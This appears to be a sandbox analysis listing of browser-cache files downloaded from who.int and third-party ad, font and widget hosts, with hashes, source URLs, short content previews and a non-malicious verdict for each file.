                                                                                                                                                                    SHA-256:FD2A752492B64050C772C50F5539A28ED106D2433945C04ABB57E3FAB1A83186
                                                                                                                                                                    SHA-512:9DF2BCA13274B8B4B2C7867FD0AB4F67587475BCB18610F408DAB8C19E7F0A7872E4D0322B23DA3265948B58C2083F289BF86EBF3B92AA89803A5982F68E4906
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ScriptResource.axd?d=VKaJmfFWDpQxp1_HxsR1qHE1D0LSpd2pufRu26_SWXJKx_WpH0HNrJsUk7mfatpo7E2ZG3zAPSalK7AO6i8q6frr9qeTupRsYs3Dn67sjSLmCFESPd3iJ_vINUWGfdbYkrtzOmP0KIfi4N8gdSZOX9KZWpxIlEcYI4xzS0Y-bAu18kf2x98txvCw052kniXxWNIL9Q2&t=ffffffffcd3c2666
                                                                                                                                                                    Preview: /*! jQuery UI - v1.12.1 - 2018-02-18.* http://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, focusable.js, form-reset-mixin.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/draggable.js, widgets/droppable.js, widgets/resizable.js, widgets/selectable.js, widgets/sortable.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/selectmenu.js, widgets/slider.js, widgets/spinner.js, widgets/tabs.js, widgets/tooltip.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\YHCW2021_webbanner[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 549x255, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):38274
                                                                                                                                                                    Entropy (8bit):7.984892584526061
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:vCwf22j5Vnm+QJ5M28x2cCKK4E2yBEifL5KsNAnuJyuk39XpZBgR6:KI221g+M5MrxcKK4EXEeLNwuBkNXdl
                                                                                                                                                                    MD5:345510F79879FD3E4DAA7090FFF8A302
                                                                                                                                                                    SHA1:68C5C91EC5928A34B609B02E02C69C3B1C03278C
                                                                                                                                                                    SHA-256:DF291640549F8FF46724D9BE1A077048809E9061B984560CE82154ACE03EF0FD
                                                                                                                                                                    SHA-512:5B23839FDBE7FB9D27761A4953F23312918D17255BF9188B5A42319C009086FF45E67379BD706A062235595F5DB9955AD3B509899D1E4F5EB080F377FEEF352B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/campaigns/annual-theme/year-of-health-and-care-workers-2021/yhcw2021_webbanner.tmb-549v.jpg?Culture=en&sfvrsn=8bc1f524_3
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C.........................................................................%.."..................................................................................:..%.X..RM.;.y.I..bk.....a......g.@6vH.ft.....}x8v......2@..H&dF..<.N..&g..>M..&#u........9.....3k:!..0.L.Y.........;...y.I.|.'..2.3..k.u. ..v.2..Pn.F....2j<.$.R...M..I..S.^9..Yh....<.$.^..B=..2..R..u%.q.3..WK..+mK.....{+...G...f.nj....G%.:b...}.^....w.5.._y.....fq..|.b..,....#m.FL....;4..N.^....,lgc.Cd....T.9z.D...f.KZ.E...N..wd[.........1Sq..o2.}-.o.9....Lz..p:3,...*3......Xi.s..q..n$1...JA-.x.....S.].z=.P.\....6Z.-|...R<S..fd.abH...3....c4..6...f.pnCD.tj.T.....].+z...dmP=.....*.....*h>.>..V.F.S.u.......S.]ll.........U....g...T.u.9.J>.O..|....6....0..'.X........2..Q{M%.....S`...[$c.I.fs..:...8{$..K/.\+.. ..G..r.k-...|...r..:.(P...f.4.&.......?..5...B....*(.m...fz.u.*.D..B..;....v..9.....v!Uk~y.bWs.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\aRB5vtMgII7DALCmCUZFfhabFCI8RNJQqSbe_9t5ggE[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):36350
                                                                                                                                                                    Entropy (8bit):5.674957632254336
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:SfZJ/WEMMnbd0TrOsUy+/cxjoGEq2rUX/sL:SP/WRr0ygGEq16
                                                                                                                                                                    MD5:0652417DC509F9DF094ED9040894BD35
                                                                                                                                                                    SHA1:FE49BE86848AD902EE441440783A2875E9EE0A51
                                                                                                                                                                    SHA-256:691079BED320208EC300B0A60946457E169B14223C44D250A926DEFFDB798201
                                                                                                                                                                    SHA-512:B5FB4825C1AC0BC6AB1EA565263E63AB1ADFAE97FFBCE2B8BC291C735FF0AB71467D668A99CF21923C7E3A0DB29117462BD615EB7EAE890E438DB98C1C4BE752
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.google.com/js/th/aRB5vtMgII7DALCmCUZFfhabFCI8RNJQqSbe_9t5ggE.js
                                                                                                                                                                    Preview: (function(){var v=function(a,C,F,Z,M){if(!(Z=(M=x.trustedTypes,a),M)||!M.createPolicy)return Z;try{Z=M.createPolicy(F,{createHTML:K,createScript:K,createScriptURL:K})}catch(Y){if(x.console)x.console[C](Y.message)}return Z},K=function(a){return a},x=this||self;(0,eval)(function(a,C){return(C=v(null,"error","ad"))&&1===a.eval(C.createScript("1"))?function(F){return C.createScript(F)}:function(F){return""+F}}(x)(Array(7824*Math.random()|0).join("\n")+'(function(){var S=function(C,a,F,Z,M,K,x,Y,v,p,H,u,w,b,W,d,P,y){if(16==(C>>((C-3)%155||(Z.U=((Z.U?Z.U+"~":"E:")+F.message+":"+F.stack).slice(0,a)),1)&87)){for(F=[];a--;)F.push(255*Math.random()|0);y=F}if(25==(9==(((16==((C^954)&123)&&(a(function(T){T(F)}),y=[function(){return F}]),C)^523)&111)&&F.uI&&m(0,F.uI,a,Z,void 0),C>>1&63)){for(Z=[],K=0;K<a.length;K+=3)P=a[K],F=(W=K+2<a.length)?a[K+2]:0,M=P>>2,d=(Y=K+1<a.length)?a[K+1]:0,x=(b=-~(P|3)-(P^3)+(~P&3)+(P|-4)<<4,v=d>>4,(b&v)+~(b&v)-~(b|v)),p=(H=(d|0)- -1+(~d|15)<<2,w=F>>6,-~(H&w)-(H&~w)+2*(
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\accordion-list.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):3689
                                                                                                                                                                    Entropy (8bit):4.880253848544661
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:pgIG7qMzPC8D88SWoX45dC7HEyXY4yZA1LyUskdg3mfkEWyuIfNZgiO/hOgp7xHe:WT6hoWdyKTT51x+/p7xHyRf
                                                                                                                                                                    MD5:D0C48CAE086C10FB25D9351BA3D914E4
                                                                                                                                                                    SHA1:EEF9F7590016F6B9A7E2910EFC1D578915FA9D2D
                                                                                                                                                                    SHA-256:5D166A69B51D2788994DD13C3436E5B6277BD73B6292438BCE448CEC2EEF9DA3
                                                                                                                                                                    SHA-512:759FBEFC04E4957270E23D50C00D8502977EFF92BF9F813AF1403DA36168578709662F9639F6F214E1A8150E7004BFC4DD65795CDA98786C9E97896B82026D15
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/accordion-list.min.js
                                                                                                                                                                    Preview: "use strict";!function(window){var accordion=null,activePanelClass="is-active",accordionPanels=null,currentPanel=null,childrenLinks=null;function _activateSelectedPanel(evt){evt.preventDefault();var selectedPanel=_findAncestor(evt.currentTarget,"sf-accordion__panel");if(currentPanel===selectedPanel&&currentPanel.classList.contains(activePanelClass))return currentPanel=selectedPanel,void _removeCurrentPanel();_removeCurrentPanel(),_displaySelectedPanel(selectedPanel)}function _displaySelectedPanel(selectedPanel){selectedPanel.classList.add(activePanelClass);var currentContent=selectedPanel.querySelector(".sf-accordion__content");currentContent.style.display="block",currentContent.style.height=currentContent.offsetHeight,currentContent.style.opacity=1,currentPanel=selectedPanel}function _removeCurrentPanel(){if(void 0===currentPanel)return this;var currentContent=currentPanel.querySelector(".sf-accordion__content");currentContent.style.opacity=0,currentContent.style.display="none",curren
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\ad_status[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                    Entropy (8bit):4.142295219190901
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:lZOwFQvn:lQw6n
                                                                                                                                                                    MD5:1FA71744DB23D0F8DF9CCE6719DEFCB7
                                                                                                                                                                    SHA1:E4BE9B7136697942A036F97CF26EBAF703AD2067
                                                                                                                                                                    SHA-256:EED0DC1FDB5D97ED188AE16FD5E1024A5BB744AF47340346BE2146300A6C54B9
                                                                                                                                                                    SHA-512:17FA262901B608368EB4B70910DA67E1F11B9CFB2C9DC81844F55BEE1DB3EC11F704D81AB20F2DDA973378F9C0DF56EAAD8111F34B92E4161A4D194BA902F82F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://static.doubleclick.net/instream/ad_status.js
                                                                                                                                                                    Preview: window.google_ad_status = 1;.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\addthis_widget[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):361292
                                                                                                                                                                    Entropy (8bit):5.507224233490729
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:joM/HvwM4X4UZ8pVTXPZIcVykc2VeakzRDU:MM/AXMDP9ykc2VeakdU
                                                                                                                                                                    MD5:61DCFA8958E6A7CC3F23B3B4758EE178
                                                                                                                                                                    SHA1:C4313CF29A2C056422AB798A2D088743C0972E97
                                                                                                                                                                    SHA-256:ACD2F7AD78EDEEBAD4B6B0FDD17FF57D81C3726C60FD5435EE8C5A0115D29403
                                                                                                                                                                    SHA-512:9FF8F714925A8CB650F206747164FBD575B964F530C4241F1B3A1F6678CAB245B5D34D6C6CFA761642026E3B7700CDA36AC0AC4143FB27F7865E3C9C5BB96D43
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/js/300/addthis_widget.js
                                                                                                                                                                    Preview: /*!.AddThis - v8.28.7 - 20201026;.Copyright (c) 1998, 2020, Oracle and/or its affiliates..*/../*!...invariant : 2.1.0.BSD.Copyright (c).All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...* Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...* Neither the name of invariant nor the names of its. contributors may be used to endorse or promote products derived from. this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS".AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE.IMPLIED WARRANTIES OF ME
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\fa-regular-400[1].eot
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:Embedded OpenType (EOT), Font Awesome 5 Free family
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):30788
                                                                                                                                                                    Entropy (8bit):6.189302031690045
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:eGvrcbhO5Q1FITSECKMSW3Ncszv6/KUgjIe66/MeM6eNwyRRiylqDF4X6B3UsmLi:eGvrcbqQ1WTSECKMSW3NcszvcKUMIe6C
                                                                                                                                                                    MD5:93CD9A877C794FE87F8CE84F189D304F
                                                                                                                                                                    SHA1:E3A0DA640F592DB27F39D267B591F61CCE80B840
                                                                                                                                                                    SHA-256:6C470766C2C3E11FAFFEAD7DDE6F0D9F4BD4E7EC1784332EA852CD08B7D757D0
                                                                                                                                                                    SHA-512:FF365F0FB203BE21A55F6A9BB848682BFDC5EE2E44F5BE32EC70639F1CDEAA5CC73A710917C5B77CE435BCA6D0A211AE662C93139F3360D639701E9F0AC4AACF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://use.fontawesome.com/releases/v5.0.10/webfonts/fa-regular-400.eot?
                                                                                                                                                                    Preview: Dx..`w............................LP..........................p...................&.F.o.n.t. .A.w.e.s.o.m.e. .5. .F.r.e.e.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .5...0...6.F.o.n.t. .A.w.e.s.o.m.e. .5. .F.r.e.e. .R.e.g.u.l.a.r................0GSUB .%z...8...TOS/2?.Pn.......VcmapEG5.........glyfi.b......._.head.}&........6hhea.;.........$hmtx............loca@.Y.........maxp........... name&f....nD....postm.....qX.......................................u.........p.._.<..............................................u.................................0.>..DFLT..latn............................liga...........................................f...G...f....................................PfEd.@.............D.......................................@...............................................................................................@...............@.......@...........@...................................................@...............@...@...............................................@......
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\favicon[1].ico
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1150
                                                                                                                                                                    Entropy (8bit):5.44221041888323
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:BvtoOaPQSV1WvuhHg9XGdqiZNPGFwUmSydj60pF3KVuz:BFDNuhHgEwRx5yFPpz
                                                                                                                                                                    MD5:031D7A3D3906B292D27013B753A2E47F
                                                                                                                                                                    SHA1:447B9ED0C25473CE78580CFFB511F98B94E71C49
                                                                                                                                                                    SHA-256:621A54FD47363C36B42E3791B1E5B36049B66C3693A7FF0C9CE20024F5620ADD
                                                                                                                                                                    SHA-512:89B719C4DCD42182612B2DF0DF5D947322CC5CFDD734DE679CFC0A678A4218D8FCDCBAB185FE0E3526A376C8ED1147918300D706B3970A140C6C932C3FE1B284
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/favicon.ico
                                                                                                                                                                    Preview: ............ .h.......(....... ..... ..........................................v..T../........4..y.........................M.........3..1..7........7..2..1.................f....!..q...........d..g...........k.................~.....r.#...+.#4.!2.!'.%...|.....x...........f.....q..E."".!#..9..C..j..0..J..w.....\....."........;..O..s..,..O........u..4..C...........X....._..g........>..q........W. %.%&..d.....L..h.....K..R.....}..O..f........N.&(.$(..O.....[..k.....L.%;.#F..w................)@.$=..R.....^..P.....I.$$.#$..;..............g.&5.#$..O.....C..4.....b.#&. &.%?..7..u........v..f.")..j.....+.....\.....=..9..W.....n..`........O..A.....T.9.. ......a..P. &..%.._........s..C..&..X..Y.......Y.........%.......(...r..q."!....)...&.......=..........i.._..s.."......O..G....
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\h-logo-blue[1].svg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):15880
                                                                                                                                                                    Entropy (8bit):4.140082608950543
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:KtSpsQ6qvH4odxQGy7bE6UYCRhmYSboCf:9zUbE6UY+EdUCf
                                                                                                                                                                    MD5:CB1B6DEA42CF42F566722BD93EF18186
                                                                                                                                                                    SHA1:2531FA2689AA23B2CDC3E154E9722E0C5E73D76F
                                                                                                                                                                    SHA-256:1F756ED7DAC7C90DA4F98582535E47684DC75ADDB21AF9653ABF9155EA3B1713
                                                                                                                                                                    SHA-512:B68448926C4D20D057CBD90B85725A49A3A999608DA6837E9F464D6018C76F9495FB3F6F5D3E5801C9A1D8C0D590173BFB0DF86E7149AEAD70208237AA3A9CE5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/images/logos/en/h-logo-blue.svg
                                                                                                                                                                    Preview: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 580.82 177.96"><defs><style>.cls-1{fill:#0093d5;}</style></defs><title>World Health Organization</title><g id="Layer_2" data-name="Layer 2"><g id="ENGLISH"><path class="cls-1" d="M164,32.58c3.86,4.6,10.61,7.31,14.56,11.92-2.83-13.63-13.35-24.76-25.79-27.42C158.84,21.65,160.15,28,164,32.58ZM14.48,67.13c8.57-18.65,21.36-14.7,26.77-32.47-3,5.45-17,7.75-23.51,21.72,3.31-8.3,1.65-21,7.25-27.85C8.25,40.88,15.38,60.86,14.48,67.13ZM30,111.86c1.54,7.26-3,17.74,4.2,27.76C26.76,131.28,11,129.16,4.58,116.48c8,31,29,24.6,38.39,31.33C35.21,136.66,41.56,129.25,30,111.86Zm-2.41,19.45C23,114,31.18,108,24.93,91.4c-.65,9.36-6.89,13.92-2.68,31C14.82,107.94,3.33,102.54,0,92.6.23,119.78,22.07,123.81,27.59,131.31Zm33.54,29c-6.43-8.9-2-13.93-20.1-30.09,3.82,5.9-.12,13.32,12.06,24.86-11.92-7-28.36-4-36.29-13.41C30.42,167.74,54.35,157.1,61.13,160.34Zm87.42-5.23c12.18-11.54,8.24-19,12.06-24.86-18.06,16.16-13.67,21.19-20.1,30.09,6.78-3.24,30.71,7.4,44.32-18.64C
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\layers.fa6cd1947ce26e890d3d[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):269557
                                                                                                                                                                    Entropy (8bit):5.429111467374434
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:ap1Lf7mGJQoq/cpp6+PVfVDRGpTr5ojO3:abj7mGJQCp6+PVfA5oK
                                                                                                                                                                    MD5:476D935D6723F9ABEA1160C155FFB725
                                                                                                                                                                    SHA1:477FF2F072C62493BE703060B3DA7C7A5492F840
                                                                                                                                                                    SHA-256:6121CA306AD1045453D52517B8F436EB5A68055C82AEFA46A9A77DE36996A3DF
                                                                                                                                                                    SHA-512:C8B11FC445236C60E3D75BDC4BE71F3E6CA46E931740795A1ADDCD86B0F53F721192842017BD414E383A74F5544C23DBADD796E2074E0FC57CCFC7F06B84CD09
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/static/layers.fa6cd1947ce26e890d3d.js
                                                                                                                                                                    Preview: atwpjp([216,210],{347:function(e,t){"use strict";e.exports=function(e,t){var a=t.replace(/\//g,"\\/").replace(/\./g,"\\.").replace(/\+/g,"\\+").replace(/\?/g,"\\?").replace(/\]/g,"\\]").replace(/\[/g,"\\[").replace(/\^/g,"\\^").replace(/\$/g,"\\$").replace(/\*+/g,".*?"),n="^"+a+"$";return new RegExp(n).test(e)||e===t}},359:function(e,t){"use strict";e.exports=function(e){return e.replace(/\s+/g,"").split("//").pop().split("#").shift().replace(/\/$/,"")}},360:function(e,t,a){"use strict";var n=a(5);e.exports=function(e){if(window.addthis_config&&window.addthis_config._forceClientMobile)return!1;var t=n("mob",e),a=t&&window.screen,i=a&&window.screen.availWidth?window.screen.availWidth:0,o=a&&window.screen.availHeight?window.screen.availHeight:0,r=!!t&&(i>o?o:i);return!!r&&r>767}},361:function(e,t,a){"use strict";var n=a(360),i=a(5);e.exports=function(e){return i("mob",e)&&!n(e)}},362:function(e,t){"use strict";e.exports=function(e,t,a){var n,i;if(e.some)return e.some(t,a);for(var o=0,r=e
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\main.min[1].css
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):345500
                                                                                                                                                                    Entropy (8bit):5.349263090498914
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:eM2I5vDPD/zo/MYOQ4xofA8ki72ZeEA/j:eOvDPD/zo/MYOQ4xy72Zy
                                                                                                                                                                    MD5:CE2173110E4830F15FAE89CB57718CFC
                                                                                                                                                                    SHA1:C68E2CF128BA2144B7B78B04BFB2EF12756FF810
                                                                                                                                                                    SHA-256:2F83A9E35BC415D3848E1485B953ED36976F02B47627D2418B286103B526D5C2
                                                                                                                                                                    SHA-512:4034594FCC1ACFDF640D00DB81E32BFF642145CAEB3D91E8122DD07CC2F7F35CF198AC54383E8139FAA8FDE829E49AFE10CACA669D1FF8B31B332DA6EDD5B474
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/styles/main.min.css?v=12.1.7126.28741
                                                                                                                                                                    Preview: .slick-slider{display:block;position:relative;box-sizing:border-box;-webkit-user-select:none;-khtml-user-select:none;-ms-user-select:none;user-select:none;-ms-touch-action:pan-y;touch-action:pan-y;-webkit-touch-callout:none;-webkit-tap-highlight-color:transparent}.slick-list{display:block;position:relative;padding:0;margin:0;overflow:hidden}.slick-list:focus{outline:none}.slick-list.dragging{cursor:hand}.slick-slider .slick-track,.slick-slider .slick-list{-ms-transform:translate3d(0, 0, 0);transform:translate3d(0, 0, 0)}.slick-track{display:block;position:relative;top:0;left:0;margin-right:auto;margin-left:auto}.slick-track:before,.slick-track:after{content:"";display:table}.slick-track:after{clear:both}.slick-loading .slick-track{visibility:hidden}.slick-slide{display:none;height:100%;min-height:1px;float:left}[dir="rtl"] .slick-slide{float:right}.slick-slide img{display:block}.slick-slide.slick-loading img{display:none}.slick-slide.dragging img{pointer-events:none}.slick-initialized
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\moatframe[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1705
                                                                                                                                                                    Entropy (8bit):5.531860359366191
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:V+SiCucuqiTlBgaavwmpbDDRlsSEpvJEBrcm:8FJqQMZvJcSEty
                                                                                                                                                                    MD5:DD1A19CB8D13E4571D2B293C0A0D2CCF
                                                                                                                                                                    SHA1:18070DD5C894930A8AEF7117BF8D49BD4922A723
                                                                                                                                                                    SHA-256:05090F9390F5BC0CD23FE5F432037CC92D7CBCE1CED9BFE8FAF3D1C9ABAE85CD
                                                                                                                                                                    SHA-512:9103CA5B7E85BA307A366134146D9505A6CA8722878629678F680B790108AB9DE31ACEDCCA36AC79EC989194BEA55C2C08CD14A08CD0BC67841D16C115D4FCB2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://z.moatads.com/addthismoatframe568911941483/moatframe.js
                                                                                                                                                                    Preview: /*Copyright (c) 2011, 2019, Oracle and/or its affiliates. All rights reserved.*/.(function(){try{var l=function(b){var a=!0;try{b.domain}catch(f){a=!1}return a},r=function(b){return b.replace(/:/g,"%3A").replace(/=/g,"%3D").replace(/,/g,"%2C")},q=function(b){try{var a;var f=b.data;if("string"!==typeof f)a=!1;else{var c=f.match(new RegExp("([a-z]+)"+d+"([a-z0-9.-]+)"+d+"([0-9]+)"+d+"([a-z]+)"+d+"([0-9]+)"+d+"(.+)","i"));a=c&&7===c.length&&c[1]===m&&c[2]===n&&-1!==c[6].indexOf("check")?!0:!1}if(a){var p;var h=window.top&&window.top.location&&window.top.location.href;p=h&&("string"!==.typeof h?0:/^(?:https?:\/\/)?[^.:\/]+(?:\.[^.:\/]+)/.test(h))?h:!1;if(p){var t,e=window.top.location.hostname.replace("www.","")+window.top.location.pathname;"string"===typeof e&&"/"===e.charAt(e.length-1)&&(e=e.substr(0,e.length-1));if(t=e){var g=JSON.stringify({available:!1,fullUrl:r(p),cleanUrl:r(t),urlSrc:5}),g=g.replace(/"(\w+)"\s*:/g,"$1:"),l=b.data.split(d),q=[m,n,k,u,l[4]||k+1,g].join(d);b.source.pos
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\origin.min[1].css
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):218081
                                                                                                                                                                    Entropy (8bit):5.096500957430576
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:pcM6NJqrquf/0H0xQCFje6tAsmUtxY+fjaN7Zys6GYGARruilnyMRyjx/M+oVpZz:p1suf/ChLY
                                                                                                                                                                    MD5:C2971D3D27BBCADAD28C58D113638037
                                                                                                                                                                    SHA1:048673CBAD9FF402269D1604E5CFC9FBC05C398E
                                                                                                                                                                    SHA-256:12E686E186A80C9D49F224BA6718A2BE0B1D17BA7E0873AA62BC5F701E1D22C6
                                                                                                                                                                    SHA-512:7824939C29AFB680F93F4EDE965A63B535255614E4D3B98E452DD1EE0F564F468B9BD614CF8C16B69792CF3BFA24DE313947EAFC51FC929AAF4DFAA7BB58FEDD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/styles/origin.min.css?v=12.1.7126.28741
                                                                                                                                                                    Preview: .sf-body,.sf-body p{font-family:Arial,Helvetica,sans-serif;font-size:16px;line-height:24px;letter-spacing:normal;font-style:normal;font-stretch:normal}.sf-main-site h1,.sf-main-site h2,.sf-main-site h3,.sf-main-site h4,.sf-main-site h5,.sf-main-site h6{font-family:Arial,Helvetica,sans-serif;line-height:normal;letter-spacing:normal;font-weight:700;font-style:normal;font-stretch:normal}.sf-main-site h1{font-size:25px;line-height:28px}@media (min-width: 478px){.sf-main-site h1{font-size:30px;line-height:33px}}@media (min-width: 768px){.sf-main-site h1{font-size:35px;line-height:39px}}@media (min-width: 1020px){.sf-main-site h1{font-size:50px;line-height:56px}}.sf-main-site h2{font-size:22px;line-height:22px}@media (min-width: 478px){.sf-main-site h2{font-size:28px;line-height:28px}}@media (min-width: 1020px){.sf-main-site h2{font-size:25px;line-height:28px}}.sf-main-site h3{font-size:14px;line-height:16px}@media (min-width: 768px){.sf-main-site h3{font-size:18px;line-height:20px}}.sf-main
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\publications-hero-image-thumb[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x589, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):59892
                                                                                                                                                                    Entropy (8bit):7.943610217019654
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:IIfsxbP7+X1bkkqWe0Rn+55RD9m91dV3A6Q4PfSl:zspPQkkqWs5fU3dVu6g
                                                                                                                                                                    MD5:E16B0792DD326A5A820A2F3F30C2FE66
                                                                                                                                                                    SHA1:981578B4C34850849DF0835ED6237C01A2F5B20A
                                                                                                                                                                    SHA-256:78BFDB6F8E80FF99D4FD642F6D387B37039DBCF5948C44A07EB9FA47E9E0F3DE
                                                                                                                                                                    SHA-512:7CBC54EEFFF90802DA3D73F760E0E1640038D5A900798E1FF62DAF854D259DBE0751D82667CF40CB55453FF09F82FF43A29CE84A790702BFDA8D0E9A2293B7D6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/publications/publications-hero-image-thumb.tmb-1024v.jpg?sfvrsn=8174ac48_1
